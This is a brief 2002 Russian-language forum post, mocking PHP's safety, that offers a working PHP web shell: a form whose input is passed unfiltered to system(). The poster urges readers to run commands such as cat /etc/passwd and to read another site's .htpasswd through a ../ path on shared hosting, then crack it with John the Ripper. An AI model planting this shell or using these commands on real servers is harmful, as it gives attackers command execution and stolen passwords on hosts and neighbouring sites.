PHP is very safe server-side scripting language!!!!!!!! -)

unReal 15.11.2002 09:13

если отключён safe_mode (а он по умолчанию, у многих отключён -)), попробуй:

<?
if (isset($c) && $c != "")
{
echo "% $c:<pre>";
system($c);
echo "</pre>";
}
?><form action=c.php method=post><input type=text name=c size=60 <?if (isset($c) && $c != ""){echo" value='$c'";}?>><input type=submit></form>

и попробуй всякие команды юникса вводить в формочку, например: cat /etc/passwd, или же: cat ../../other_site/html/.htpasswd и в Джона Риппера полученный файл! ;)

зы. и пхп и cgi -- очень дырявые! про парсер пока такое сказать не могу, но кто знает... -)

---